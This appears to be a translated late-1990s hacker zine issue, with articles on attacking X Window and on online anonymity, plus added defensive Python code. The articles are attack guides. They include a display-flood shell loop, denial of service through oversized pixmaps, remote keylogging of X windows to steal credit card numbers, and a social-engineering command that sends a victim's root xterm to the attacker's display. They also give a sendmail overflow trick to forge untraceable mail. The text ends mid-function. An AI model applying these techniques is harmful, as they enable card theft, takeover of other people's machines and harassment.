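    number, _, screen = rest.partition(".")
    display = int(number)                 # ValueError if not numeric
    local = host in ("", "unix")          # "unix" is Xlib's explicit local form
    return {
        "host": None if local else host,
        "display": display,
        "screen": int(screen) if screen else 0,
        "tcp_port": None if local else X_TCP_BASE + display,
    }


def audit_xhost(output):
    """Findings for the text printed by `xhost` run without arguments."""
    findings = []
    lines = [ln.strip() for ln in output.splitlines() if ln.strip()]
    if lines and lines[0].startswith("access control disabled"):
        findings.append("access control is off: any host may connect")
    for entry in lines[1:]:
        # Assumption: LOCAL: and SI:localuser/localgroup entries are local-only.
        if entry.lower().startswith(("local:", "si:localuser:", "si:localgroup:")):
            continue
        findings.append("remote host allowed: " + entry)
    return findings


def audit_server_args(cmdline):
    """Findings for an X server command line, following the article's advice.

    Written for the 1999-era server the article describes; later servers may
    already default to not listening on TCP.
    """
    args = shlex.split(cmdline)
    findings = []
    if not any(a == "-nolisten" and b == "tcp" for a, b in zip(args, args[1:])):
        findings.append("no `-nolisten tcp`: server accepts TCP connections")
    if "-ac" in args:
        findings.append("`-ac` given: host-based access control is disabled")
    if "-bs" not in args:
        findings.append("no `-bs`: backing store is available to clients")
    return findings


# Constructed sample inputs (not captured from a real system).
SAMPLE_XHOST = """access control disabled, clients can connect from any host
INET:hitar.phreedom.org
LOCAL:
SI:localuser:root
"""
SAMPLE_CMDLINE = "/usr/X11/bin/X :0"

if __name__ == "__main__":
    print(parse_display("pesho.phreedom.org:0.0"))
    for finding in audit_xhost(SAMPLE_XHOST) + audit_server_args(SAMPLE_CMDLINE):
        print("FINDING:", finding)
```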

     2.1) Backing Pixmap attack

 As I already mentioned, when something has to be shown on the screen, it
 must be transferred from the program's memory to the server's memory
 through the transport protocol, which can be quite slow over a slow
 connection (read point 3 for an example). For this purpose the boys at MIT
 invented the backing pixmap, which is really something like a memory DIB in
 Woza. You draw into the pixmap, and when needed you have X bitblit it to
 the screen. That way, when part of your window is uncovered, you will not
 have to redraw it and transfer all the information over the network again.
 A nice thing, but there is just one problem. X usually runs as root:root,
 which means there are no limits on its use of resources. And if some idiot
 decides that he needs a 32000x32000 window with a backing pixmap, and with
 a TrueColorVisual (24 or 32 bpp) at that, then 3 GB of RAM go up in smoke.
 Unless you bought your computer specially for Woza 2000, you have reason to
 worry about what exactly will happen to your poor machine.

 A backing pixmap can be made in all sorts of ways; with GTK+, for example,
 it is easiest (I say so because I have not yet figured out exactly how it
 is done with plain Xlib :). Remember, you do not need to have GTK+ on the
 server, as long as the attacker has it. Only the graphics stream comes to
 you, and only the event stream goes to him (plus a great, great deal of
 housekeeping information, which does not care at all who generated it,
 whether Xlib or something on top of Xlib). Anyway, everything comes down to
 Xlib in the end. Oh, and if you are going to use your machine only as an X
 server, you can safely delete most of the things in /usr/X11Rx/lib. Type
 `ldd /usr/X11/bin/X' to see what X uses, and look at the file XF86Config to
 see which modules are loaded. So choose carefully the hosts you allow
 access to, or else start X with the option `-bs', which will disable
 Backing Store on all screens. Well, the speed will drop for local
 connections too, but at least you will be protected. Oh, I almost forgot:
 you did understand that the pixmaps in question are in the address space of
 the server, and not in that of the client program, right?

     2.2) Windows Flood attack

 This one is simple. The attacker has a big machine (lots of RAM and a big
 process table) and a fast connection to you. Let your host be
 balam.phreedom.org and his be hitar.phreedom.org. You were foolish enough
 to type `xhost +hitar.phreedom.org', and he was clever enough to type:

 while [ 1 ]; do
         xmessage "Ebah li ta sega!?" -display balam.phreedom.org:0.0 &
 done

 The option `-display ...' is standard for all programs that use Xlib and in
 essence overrides the value of the DISPLAY variable. The format is the same
 as for DISPLAY. And what happens? Your screen starts to fill up with
 disgusting-looking windows (xmessage uses Athena) containing that
 uncensored message, with an ugly rounded okay button underneath. And until
 you kill it with the window manager or press the button, the message stays
 there and clutters your screen. Something similar happens with ICQ for Woza
 when it gets flooded. One tip: install a 3D version of Athena for a
 better-looking xmessage. There are versions that emulate W95 and NeXT. If
 you are too lazy to close all the windows and your window manager has no
 `Kill all windows' option (and I have not noticed any that has), all that
 is left is to press LAlt+LCtrl+BackSpace (L means Left) and kill X. And if
 you disabled that when configuring X, my condolences. You can only start an
 xterm (if X has not been overloaded by all your windows) and type
 `killall -9 X'. That is guaranteed to kill X. Well, it can be done more
 easily if the window manager has an 'Exit' command, or better still 'Exit
 session' :-) Yours surely has one ...

     2.3) Remote Fishing

 (I think this one will be the most interesting...)

 There is no way that none of you has written a trojan for stealing credit
 cards. Whether by intercepting the keyboard or by scanning the windows, all
 sorts of methods. And all of them rely on the good old hooks. And the
 programs have to hide, be installed secretly and so on. Well, under X a
 hook cannot be installed because of the network separation, which is bad.
 On the other hand, lots of people shop over the WEB, and Linux has
 Netscape, and Mosaic, and RedBaron, and a whole heap of other browsers
 (let's not forget lynx :) It would be a pity if it turned out that Linux
 users are immune to this kind of robbery.

 Well yes, but no! X offers a unique solution. Any window on the screen can
 be instructed (that is, X can be) to send its events to other programs,
 with each of them submitting its request individually. For example, I take
 a liking to an xterm in which root is working, I take its window descriptor
 in the variable `win', `d' is my display handle (the connection), as
 returned by XOpenDisplay, and I say: XSelectInput(d, win, KeyPressEvent);
 Oh, miracle! On every key press in the xterm's window, a key-press event
 appears in my program's queue. All that remains is to translate it! Hee
 hee, now I see everything root types. And he does not know it, because I
 have not run the program on his computer but on mine (again DISPLAY and
 xhost), and my program has not created a window. Naturally, if that guy
 types `netstat -an' he will see the connection, but those are the risks of
 the trade. And in case you have not yet understood what I mean: you steal
 CCs without even running any code on the victim's machine. You just have to
 slip `xhost +washto.ip' in somewhere. Next comes the other important step:
 XSelectInput has to be called for every window, not only for the main ones,
 i.e. it has to be called recursively. XQueryTree is there for that purpose.
 You start from the desktop (or root) window and go on to the bottom. And it
 is a good idea to do this at some interval, say 1 sec, otherwise you will
 not catch the new windows (the ones that appeared after the program was
 started). Well, if you do not feel like sitting all day and all night in
 front of the console (or the Eterm, if you are fans of X), you make a
 scrolling buffer, 2 KB, stuff everything you catch into it, process <Tab>
 and <BackSpace>, and watch for a valid credit card number to appear. If one
 does, then, as Star Gruhtar says in Phreedom Magazine #16, you take 1 K
 before it and 1 K after it and `save to disk' :) Or you can log everything,
 if you like.

 Naturally, this program can also be run on the victim's computer, so that
 you do not have to slip in hidden calls to xhost. In that case it is
 written as a standard trojan with all its cryptography, connection
 problems, need for a mail server and so on and so forth. It is all a matter
 of choice. If you have a permanent and stable connection to the network,
 the trojan in question comes down to one small program that adds a call to
 xhost in the necessary places and mails you the IP and the system version
 (uname -a), as well as the version of X, which can be found out by
 searching the disk for a directory X11Rx, where x E {2,3,4,5,6} (E to be
 read as 'is an element of'). Naturally you will not do it the way `find'
 does, but will put a sleep between opening the individual directories,
 because you do not want to push the load sky-high! I personally prefer the
 first method, because it is simply the life to sit at home and watch the
 victim chatting someone up over ICQ|IRC|(soon over SPIRT too :). But that
 is not always possible, especially if the victim, like me, runs iptraf in a
 window and keeps an eye on his connections all the time. Then you can try
 to stick something into the kernel and make hidden connections over some
 non-IP protocols. Or you can simply trojanize iptraf and netstat.

 If everything said so far sounds like Korean to you and you have not the
 faintest idea how all this is done in practice, here is a URL where there
 is a primitive program that intercepts the keyboard under X:

     ftp://ftp.technotronic.com/unix/xwin-exploits/xkey.c

 You grab it, modify it (you send it to me by e-mail) and start enjoying
 life and going to the mountains and the fresh air more often. A trojan like
 this is best stuffed into some Window Manager, since the latter has the
 property of receiving special events from X when windows are created and
 removed, so the need for a timer goes away. And it will be known at every
 moment which window is the active one. For example, a valid credit card
 number can also be typed into XCalc (a calculator for X), but that one will
 hardly be of any use. It is all a matter of ambition, imagination and
 programming skill. If I had enough of the last, by now half of you would
 already be using a trojaned WM :-)

     2.4) Let's write ourselves a proxy

 So far so good. But you do need to allow some host to connect to your X
 server. What happens on a connection attempt? X accepts the connection and
 takes its IP. Then it rummages through an internal table to see whether
 that IP is allowed to connect, and if it is not, it closes the socket, and
 the client sees the following message:

     Xlib: connection to "xserver.phreedom.org:0.0" refused by server
     Xlib: Client is not authorized to connect to Server
     Error: Can't open display: xserver.phreedom.org:0.0

 Very unpleasant. However, if you run iptraf, you will see that there is
 still an exchange of information over the socket before it is rudely closed
 by X. That in turn suggests the idea that one can try creating a large
 number of connections, either through normal TCP connect(...) or through a
 SYN flood. The effect is that X hangs so beautifully that my soul overflows
 with delight when I watch it.

 And so that such savagery does not happen, proxies get written. What is
 done? First, non-local TCP connections are forbidden with the option
 `-nolisten tcp', so that X remains only on the Unix domain socket
 /tmp/.X11-unix/X0. Then local connections are allowed with 'xhost +local:'.
 Finally a proxy is started which sits on X's port (6000+<display>), and
 when it receives a request it checks its own table of hosts or checks the
 magic cookie, and if everything is in order, it connects to the Unix domain
 socket and starts working as a simple port redirector. As simple as you
 like, even dumb. That way, in a flood, at most the proxy will crash, and
 you will not even notice that anything has happened. But that is not all.
 The proxy in question can even tamper with the data being exchanged and now
 and then insert various additional commands to X, for example changing the
 cursor type and thereby automagically animating it. You can also do all
 sorts of crazy things, but for that you will need a deep knowledge of X/OTP
 itself.
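
 The proxy described above, reduced to its host-table check and its port
 redirector, as an added example in Python (not code from the article; the
 magic-cookie check is left out). It assumes X was started with
 `-nolisten tcp', so that port 6000+<display> is free for the proxy; the
 function names, the session cap and the sample table are choices made for
 this example.

```python
import ipaddress
import selectors
import socket
import threading

X_TCP_BASE = 6000              # from the article: X's TCP port is 6000+<display>
X_UNIX_DIR = "/tmp/.X11-unix"  # local socket directory, e.g. /tmp/.X11-unix/X0


def x_endpoints(display):
    """Map a display number to (TCP port to listen on, Unix socket to forward to)."""
    if display < 0:
        raise ValueError("display number must be >= 0")
    return X_TCP_BASE + display, "%s/X%d" % (X_UNIX_DIR, display)


def host_allowed(peer_ip, allow):
    """The proxy's own host table: True if peer_ip lies in an allowed network."""
    ip = ipaddress.ip_address(peer_ip)
    return any(ip in net for net in allow)


def open_session(client, peer_ip, allow, unix_path):
    """Check the peer, then connect to the X server's Unix domain socket.

    Returns the upstream socket, or None after closing `client` when the peer
    is not in the table or the server socket cannot be reached.
    """
    if not host_allowed(peer_ip, allow):
        client.close()          # refused here; the X server never sees this peer
        return None
    upstream = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        upstream.connect(unix_path)
    except OSError:
        upstream.close()
        client.close()
        return None
    return upstream


def relay(client, upstream):
    """Plain port redirector: copy bytes both ways until either side closes."""
    sel = selectors.DefaultSelector()
    sel.register(client, selectors.EVENT_READ, upstream)
    sel.register(upstream, selectors.EVENT_READ, client)
    try:
        while True:
            for key, _ in sel.select():
                data = key.fileobj.recv(65536)
                if not data:
                    return
                key.data.sendall(data)
    except OSError:
        pass
    finally:
        sel.close()
        client.close()
        upstream.close()


def serve(listener, allow, unix_path, max_sessions=32):
    """Accept loop with a session cap, so a connection flood is shed here."""
    slots = threading.BoundedSemaphore(max_sessions)

    def run(client, upstream):
        try:
            relay(client, upstream)
        finally:
            slots.release()

    while True:
        client, peer = listener.accept()
        if not slots.acquire(blocking=False):
            client.close()      # at capacity: drop the connection, do not queue it
            continue
        upstream = open_session(client, peer[0], allow, unix_path)
        if upstream is None:
            slots.release()
            continue
        threading.Thread(target=run, args=(client, upstream), daemon=True).start()


if __name__ == "__main__":
    # Constructed sample table: loopback plus one documentation-range network.
    table = [ipaddress.ip_network(n) for n in ("127.0.0.0/8", "192.0.2.0/24")]
    port, path = x_endpoints(0)
    serve(socket.create_server(("", port)), table, path)
```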

 In the end the result is as if you were dynamically adding code to the
 application, even if you have never seen the executable and even if you do
 not know who runs it and where exactly. But that is X Window for you! As it
 was put somewhere: "X Window - Power Tools for Power Fools" :-), and also:
 "X Windows - Your nightmares come true"! That was written in the program
 fortune, whose purpose is to make Unix a little more fun by dispensing
 various wisdoms at the client's request. Well, draw your own conclusions.
 By the way, X has a terrific screen saver with colliding galaxies...

     3) "Remote root" the sucker's way (a.k.a. "enough people have screwed
        with me, now I want to screw with someone too")

 Fine, fine! Now I will explain how, with the help of an X server and a
 little social engineering, you can get a shell on someone else's machine
 (even root, if the victim is gullible). First you have to start your X and
 allow connections from the victim's host with `xhost
 +vertwa.phreedom.org'. Then you set about convincing the victim that you
 have written a powerful new proxy for X and urgently need to test it,
 because tomorrow morning you have to hand it over to the company you work
 for. Naturally, plenty of $ and a big treat await those who agree to test
 your proxy. However, an `xterm' has to be started, and as root at that,
 because that is where it used to crash before, and you think you have fixed
 the bug. The only thing she (the victim) has to do is type this in a root
 terminal: `xterm -geometry 80x5 -display xserver.phreedom.org:0.0 &' and
 wait for the xterm to show up on the screen. If you have read everything so
 far carefully, you should work out for yourselves that the wait will be a
 long one. Meanwhile, on your side, a lovely root xterm will start to appear
 on your screen, element by element. Why element by element? Well, because
 you are on a 28.8 kbps PPP dial-up, and the X protocol is quite sensitive
 to the speed of the connection. Run iptraf and you will understand what I
 am talking about. That is also what the option `-geometry 80x5' is for. It
 says: 80 columns by 5 rows. The ampersand sends the program to the
 background. The victim usually answers with the following: "Well, it
 printed some number in square brackets and now it lets me enter commands
 again. Nothing comes up!" Hey, don't rush, wait, the connection is slow!
 Meanwhile, you know what can be done with a root shell, I am not going to
 explain that to you as well. And by the time that one works out what is
 going on, there are already at least 5 different backdoors.

 Kogato  izmislih taq taktika se symnqwah che nqkoj wyobshte shte se hwane na
 toq  prozrachen  nomer. Wseki Unix-ar, kojto razbira pone malko ot X shte mi
 tegli  edna  cwetushta  i  poweche  nqma  da  mi obryshta wnimanie. No kakto
 spomenah  w  nachaloto,  kuco i sykato trygna da si slaga Linux, i se okaza,
 che ima balamurnici, koito se hwanaha na taq wydica. Nqma da citiram imena i
 nickowe  za  da  ne  obidq nqkoj. Shte kava samo: "Momcheta i momicheta deto
 za  pyrwi  pyt  wivdate Linux i se prawite na golemi specialisti. Wnimawajte
 kakwo  pishete  po  terminalite  i kakwi programi puskate. Chetete po-chesto
 Phreedom  Magazine  i ne se prawete na mnogo umni, naj-malkoto po IRC i to w
 kanalite #phm. Ne znaete kakwi idioti dremqt tam (napr. Moq Milost) ;^)"

 // well, the bit in quotes doesn't have to be published :-)

     4) Conclusion

 In conclusion I want to say the following. X Window really is a "power
 tool", but if you don't understand it and can't handle it, you can easily
 turn into a "power fool". It is a powerful but capricious graphical
 environment, which you nevertheless have to look after like a Tamagotchi. If
 you take good enough care of her (or him, I still haven't figured out the
 gender of X), the X Window system can offer you a terrific working screen,
 and you will never again even think of running it without X (it goes without
 saying that I am talking about Woza). Once again, fortune had this to say:

     "What's worse than X Window? (Tip: try it without the `X')"

 The full description of X takes up a whole shelf of books of 1000-2000 pages
 each, and it is absolutely impossible to cram it into a magazine like
 Phreedom. That is, not that it can't be done, but you wouldn't be able to
 download it :-) Here I gave you the basics, and if you get interested, read
 man pages, buy yourselves books with stolen credit cards, learn and think.
 Room for new ideas: bol (this is not Bulgaria Offline, but the Turkish word
 for `as much as you want')! And if you feel like it, you can also write to
 me at spitem@phreedom.org, I won't be angry with you.

 P.S. IMPORTANT: None of the hosts in the phreedom.org domain mentioned above
      is a really existing machine. Any coincidence with the names of real
      people and machines is accidental. All characters are made up by me,
      the author of the article. I just like the Phreedom domain an awful lot.

 signed: spaitcho
 
 >> EOA << 

 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#14ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Cyber Anonymity Tutorial                                      MiCRoPhoBIC 
 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-

 I don't know if it is like this for everyone, but personally, when I sit
 down at the keyboard I think that nobody can tell me anything any more, that
 I am completely anonymous, that I can say/do whatever I want. It is like
 with the telephone: you talk to someone and meanwhile you can do anything
 else at all without being afraid that the person you are talking to will
 find out exactly what you are up to. (btw. I know a guy who can talk on the
 phone while playing Need For Speed..!)

 But that is an illusion, because everything, absolutely everything that is
 done can be found out. The fact that the person on the other end doesn't see
 you in 3D does not mean that he doesn't know/can't find out something about
 you. So if I have scared anyone, he can keep reading, because there is still
 at least a little anonymity, and if one knows how to use it, life will be
 quite a bit easier, and besides he will get to live it in the daylight ;-)

 I am not encouraging anyone to take advantage of this anonymity for
 'illegal' purposes. But still, that is your business. Just act sensibly.

 Let's start with the WEB:

 Everyone thinks that browsing is like reading a newspaper, throwing it away
 and simply picking up another one, and so on. To these people I would say:
 look at your hands... you haven't even opened the newspaper yet and you
 already have tiny traces of ink on your fingers... tiny, BUT enough for some
 forensic expert to tell you what ink it was and when it was used for
 printing, from which you can guess that after a little 'research' he can
 find out exactly which newspaper it was. I hope everyone got what I mean (if
 there is anyone still wondering, sorry... that is the example that came to
 mind at the moment ;-) All of the above in 10 words: while you browse, quite
 a lot can be found out about you.

 For example:

 + You visit a page. As soon as it has loaded, the webmaster (and not only
 he) can already know:

     1. Your IP.
     2. Your hostname.
     3. Your continent.
     4. Your country.
     5. Your city.
     6. Your web browser (and its version).
     7. Your operating system (OS).
     8. Your screen resolution.
     9. Your colour depth in bits.
     10. The previous URL you were at (i.e. where you came here from).
     11. Naturally, your Internet provider (ISP).
     12. ..and there is more ;-)

 (Note by Iron - personally I am not afraid of anyone knowing these things...
 but that depends ;-)

 If you don't believe it, go for example to:
 http://www.cyberarmy.com/cgi/whoami.pl

 You will say: heh, that is nothing... But you are wrong: it is enough for
 them to tell you even what size underpants you wear (with small exceptions).
 One phone call with the admin of the ISP is enough and that's it.

 Just for those who still don't believe, let me mention... a year ago my
 father came with a clumsily written e-mail address, something like
 (xxxx@hotmEil.com ;-), and said that it belonged to our godfather, who has
 been in the USA for 3-4 years. I got interested enough, and after several
 hours of digging, from the mail address alone (which, note, is at
 hotmail.com) I managed to find out his address, his phone number, where he
 works (because he is a Dr. ;-), and even a map of the street he lives on,
 with the exact place where he lives circled in red... well yes, you will
 say, that is the USA after all. But don't forget that our cities here do not
 have millions of people... not to mention that in the smaller towns there
 aren't all that many people who know what the Inet is. And for the 'bad
 guys' it is enough just to find out your phone number, right? ;-)))

 Example:

 Since I have a soft spot for Seattle ;-) here, look for example at:

   http://maps.yahoo.com/py/maps.py?Pyt=Tmap&addr=&csz=Seattle&x=10&y=13

 you can zoom... although the maps on maps.yahoo.com are a bit poor, there
 are much more detailed ones.

   http://www.lib.utexas.edu/Libs/PCL/Map_collection/world_cities.html

 is a nice resource.

 MiCRo$oFT ;-( unfortunately have very good satellite images... I don't
 remember the URL. Search for maps with av.com, it was something like
 terra.server.microsoft... or ~

  =======> cookies (or the little biscuits)

 Now remember the ink traces on your fingers ;-)

 Maybe you have noticed: websites are getting smarter and smarter and more
 dynamic... eh... and that has its price. This price is called a cookie
 (biscuit, shortbread, wafer ;-), but here they are no longer for satisfying
 the culinary needs of the user, but for making things easier (sometimes for
 making them harder ;-). This means that the cookies are set by the script
 that you have called.

   Set-Cookie: NAME=VALUE; expires=DATE;
   path=PATH; domain=DOMAIN_NAME; secure

 I won't describe to you exactly how it all happens ;-), I will only tell you
 that these are small pieces of information which the browser writes into
 cookies.txt (with netscape it is in the directory:

      c:\Program Files\Netscape\Users\default\cookies.txt)


 These cookies keep whatever information the webmaster wanted: date and time
 of the last visit to the site, information about the name, mail, account...
 etc, which, as you understand, is quite unpleasant sometimes. Someone sits
 down at your PC and, even if you have deleted the browser's history, still
 finds out where you have been.

 Here, I will show you for example a few of my cookies (naturally, slightly
 reworked ;-):

 .webjump.com  TRUE    /  FALSE  2061246402  SITESERVER      ID=ae534c416fff780ba79f3a270503cdc
 news-bg.com   FALSE      FALSE  1858918878  News-bg vote235
 .netscape.com TRUE    /  FALSE  1393939478  HITO_VISITS     AF3E11199+10AFA6*E0D4E*1

 For example, news-bg.com shows that I have already voted, and that means
 that if I try to vote again, the cgi script will check and find out that I
 am not allowed to again. ;-) Naturally, you can turn off accepting cookies,
 but sometimes that doesn't help: the script will simply tell you 'I want
 cookies' and won't work.

 [Ed. note: the mobikom page for sending a message to a pager is protected in
 a similar way. the idea is that you can't just link their script from your
 own page like that; the goal is for everyone to go to them and send the msg
 from there. the protection is very elementary, though: along with a .gif of
 a little button you are sent a cookie, which is then sent back, and if the
 corresponding cookie is not passed, you are simply out of luck. You can
 probably guess for yourselves how banal it is to overcome this kind of
 cookie protection, and I for one expect that any moment now some mad
 anarchist will make himself a little script with which to flood the pagers
 in BG :).]

 I think it has become clear to you what cookies are, and that people with
 diabetes should not eat them ;-))))

 (btw. You can read more about cookies for example at:

      http://www.netscape.com/newsref/std/cookie_spec.html)
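
 To see what the cookies section above means in practice, that is, what
 someone who sits down at your PC can read out of cookies.txt, here is an
 added example (not part of the original article) that parses the file and
 lists which sites will keep recognising the browser and for how long. It
 assumes the usual seven tab-separated fields per line; the function names
 and the sample lines are constructed for illustration.

```python
from datetime import datetime, timezone
from typing import NamedTuple


class Cookie(NamedTuple):
    domain: str
    subdomains: bool    # TRUE: sent to every host under `domain`
    path: str
    secure: bool        # TRUE: only sent over an encrypted connection
    expires: datetime   # stored in the file as Unix epoch seconds
    name: str
    value: str


def parse_cookies_txt(text):
    """Parse the contents of a cookies.txt; return (cookies, rejected)."""
    cookies, rejected = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.startswith("#HttpOnly_"):
            # Prefix written by later tools such as curl; the rest is a cookie.
            line = line[len("#HttpOnly_"):]
        elif not line.strip() or line.startswith("#"):
            continue                      # blank line or comment
        fields = line.split("\t")
        if len(fields) != 7:
            rejected.append(
                (lineno, "expected 7 tab-separated fields, got %d" % len(fields)))
            continue
        domain, sub, path, secure, expires, name, value = fields
        if sub not in ("TRUE", "FALSE") or secure not in ("TRUE", "FALSE"):
            rejected.append((lineno, "flag is not TRUE/FALSE"))
            continue
        if not (expires.isascii() and expires.isdigit()):
            rejected.append((lineno, "expiry is not epoch seconds"))
            continue
        when = datetime.fromtimestamp(int(expires), tz=timezone.utc)
        cookies.append(Cookie(domain, sub == "TRUE", path,
                              secure == "TRUE", when, name, value))
    return cookies, rejected


def privacy_report(cookies, now):
    """One row per cookie, longest-lived first: who remembers you, how long."""
    rows = []
    for c in cookies:
        rows.append({
            "site": c.domain.lstrip("."),
            "name": c.name,
            "years_left": round((c.expires - now).days / 365.25, 1),
            "whole_domain": c.subdomains,   # every host of the site sees it
            "plaintext_ok": not c.secure,   # also sent over unencrypted HTTP
        })
    return sorted(rows, key=lambda r: -r["years_left"])


# Constructed sample in the layout of the three lines shown in the article.
# The second entry has only six fields (no path), so it is rejected instead
# of being parsed with its columns shifted.
SAMPLE = (
    "# Netscape HTTP Cookie File\n"
    ".shop.example\tTRUE\t/\tFALSE\t2061246402\tSESSIONID\tID=0123abcd\n"
    "poll.example\tFALSE\tFALSE\t1858918878\tpoll\tvote235\n"
    ".portal.example\tTRUE\t/\tTRUE\t1393939478\tVISITS\t7\n"
)

if __name__ == "__main__":
    found, bad = parse_cookies_txt(SAMPLE)
    issue_date = datetime(1999, 12, 21, tzinfo=timezone.utc)
    for row in privacy_report(found, issue_date):
        print(row)
    for lineno, reason in bad:
        print("line %d rejected: %s" % (lineno, reason))
```
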


   =======> .chk files (a small lyrical digression)

 If you have noticed, sometimes when you do a quick reboot or restart
 suddenly (most often through no fault of your own ;-)), .chk files appear in
 C:\

   for example:

   FILE0001.chk
   FILE0002.chk
   FILE0003.chk

  and so on

 You will be charmed (in despair !!! ;) at how much information you can find
 in them..!! Delete them as soon as you notice them.

   =======> Anonymizer (You can use anonymizers)

 They work in the following way:
   1. You go to the anonymizer's page
   2. You fight your way through the ads and banners.. and reach the field
      that invites you to type the URL of the site you want to browse
      anonymously.
   3. You type the site, press ENTER or click (just one click! ;-)))
   4. You think you are browsing anonymously !?!!?

 Legend: point 4 - You think so, because even if the site does not find out
 your real IP, with enough interest (as long as it is worth it) it can ask
 the anonymizer for a little information. Which, if there is something in it
 for them, will gladly reveal whatever it can. So to be 'safer', use several
 anonymizers... no, not one after another, but by 'stringing' them together,
 for example:

  http://www.AzSymAnonymizer.com/cgi-bin/TovaEMojatScript.cgi?http://www.AzSymDrugAnonymizer.com
  /cgi-bin/ATovaPykEMojatScript.cgi?http://www.ATovaEURLotKydetoUseraIskaDaOtideAnonimno.com

 (Note by Iron - on one of the sites I maintained we had problems with spam
 coming from www.anonymizer.com... We just had to call the staff there and
 say that we were being spammed, so that they would put us on the list of
 banned sites... It was done in no time)

 All of the above is written on one line, together :-))). This way you can
 string together quite a few anonymizers, and the chance of someone tracing
 you through the logs is much smaller.

 Here is the best-known anonymizer: www.anonymizer.com

 (btw. you can also use Altavista as an anonymizer, by giving the URL to the
 translation service ;-)

   =======> Anonymous proxies

 They work in exactly the same way as the proxies your ISP gives you to use
 along with your account. In principle everything about them is standard...
 you connect to port 8080 and submit your request ;-) with the difference
 that your ISP's proxies are configured so that nobody except people with the
 provider's IPs can use them. (after all, people pay ;-). But please, just
 don't confuse one thing. An anonymous proxy is not one that lets you connect
 to it and use it even though you are not from its Internet provider. For a
 proxy to be anonymous, you must be able to connect to it freely from
 anywhere, and in addition it must not send your IP in the header. Because
 most proxies do. They send their own IP together with the IP of the user who
 made the request (for security reasons, naturally ;-(

 But if you dig around a bit, you can find good anonymous proxies. Naturally,
 I will recommend Cyber Army to you: a paradise for at least a little
 anonymity ;-)

        http://www.cyberarmy.com/lists/proxy/

 Here you can not only see a big list of anonymous proxies, but also test
 your proxy so that you don't make a ..... of yourself ;-)

   ========> Anonymous Remailers

 Their purpose, as you can guess, is to let you send your letter anonymously
 (we have an understanding about 'full-anonymous', right? ;-) Here is one:
 http://anon.isp.ee/

   --> (btw. this one is designed spec. for ManiaX ;-)))))

 - On the site they swear that they keep no logs. Who knows.?!

 Most of them are free, naturally, otherwise who would use them :-) I will
 describe how to work with it. You sign up for the free account; once you
 have done that, you send an e-mail to robot@anon.isp.ee (with no SUBJECT!!!)
 and as the text you write the following:

   < ------- cut here -------- >
   user: your username
   pass: your password
   realaddr: the recipient's e-mail address.
   realsubj: the subject of the mail.
   < ------- cut here -------- >

 for those who are lost, here is another example :-) : You want your letter
 to look like this:

///////////////////////////////////////////////////////////////////////////////////////
  Subject: Eiiiiiiiiii ;-))))))
  and text:
  Mara we.
  Ohliuffff, if your daughter shows up in our neighbourhood one more time I
  will make you a grandfather !. I am not joking :-)!
///////////////////////////////////////////////////////////////////////////////////////

 to his mailbox klepar@negovotoisp.com

 you send the following mail to robot@anon.isp.ee (DO NOT PUT A SUBJECT!!!)

  < ------- cut here -------- >
  user: user (write your username instead of user)
  pass: pass (and the password instead of pass)
  realaddr: klepar@negovotoisp.com
  realsubj: Eiiiiiiiiii ;-))))))
  Mara we.
  Ohliuv, if your daughter shows up in our neighbourhood one more time I
  will make you a grandfather !. I am not joking :-)!
  < ------- cut here -------- >

 oh, and without the <--- cut here ---> lines ;-)

 Once it has been sent, you will get a confirmation back from anon.isp.ee
 that it was sent successfully. And the best part is that when the father
 replies, you will receive his letter, and he will still be wondering who you
 are ;-))) (But please, don't behave like monkeys, unless you are really
 forced to). And yes, there are web based remailers too, but the bad thing
 about them is that you can't get your reply :-)

   ========> SMTP relaying

 This is a method that I think is known to everyone, but just in case I will
 describe it.

 You find yourself an SMTP server. Here, I will give you a hint again:

  http://www.cyberarmy.com/lists/smtp/

 or you scan for one, but the important thing is that it runs an old sendmail
 version. I think it was below 8.6, and you telnet to its SMTP port, the
 25th. It should greet you and tell you its sendmail version. After that you
 type:

    hello zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.....

            (arbitrary characters ---^ just in case, > 4096 of them ;)
 This produces a buffer overflow and messes up the field in which your IP
 will be written later.

 After that you type:

  mail from: cya@aligator.com  ( you can choose whatever address you
                                 want - it will show up as the sender
                                 at his end)

   Then:

   rcpt to: mojat@vrag.com           (this is the victim's mailbox)

   Then you type just:

   data

   And after you press Enter you start with the explanations (this is the
   text):

   Zdrasti prijatel kak ja karash ?........and so on
   you keep writing...

    When you finish you press Enter, type a single dot and press Enter again.

 Done. Just one piece of advice: always try this first by sending a test to
 yourself. Check whether what comes out is 'zzzzzzzzzzzzzzzzzzzzzz...' or
 your IP. The latter is not desirable :) Enough about SMTP relaying ;)
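
 The oversized greeting described in this section only matters to a server
 that copies the line into a fixed buffer without checking its length. As an
 added example (not part of the original article and not sendmail's code),
 this is the check a receiving server applies before it parses a greeting,
 using the RFC 5321 limits of 512 octets per command line and 255 per domain
 name. The function names and the sample session are constructed for
 illustration.

```python
import io
import re

MAX_LINE = 512     # RFC 5321 section 4.5.3.1.4: command line, CRLF included
MAX_DOMAIN = 255   # RFC 5321 section 4.5.3.1.2: domain name
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
DOMAIN_RE = re.compile(r"^%s(?:\.%s)*$" % (_LABEL, _LABEL))
# Loose shape check for "[192.0.2.7]" or "[IPv6:...]", not a full validator.
LITERAL_RE = re.compile(r"^\[(?:IPv6:)?[0-9A-Fa-f:.]+\]$")


def read_command(stream):
    """Read one line from the client without ever buffering more than
    MAX_LINE + 1 octets. Returns (first MAX_LINE octets, total line length).
    The remainder of an oversized line is read and discarded piecewise so
    the next command starts at the right place."""
    first = stream.readline(MAX_LINE + 1)
    total, chunk = len(first), first
    while chunk and not chunk.endswith(b"\n"):
        chunk = stream.readline(MAX_LINE + 1)
        total += len(chunk)
    return first[:MAX_LINE], total


def check_greeting(line, total):
    """Return (reply_code, reason) for a line offered as HELO/EHLO."""
    if total > MAX_LINE:
        return 500, "line too long (%d octets)" % total
    if not line.endswith(b"\r\n"):
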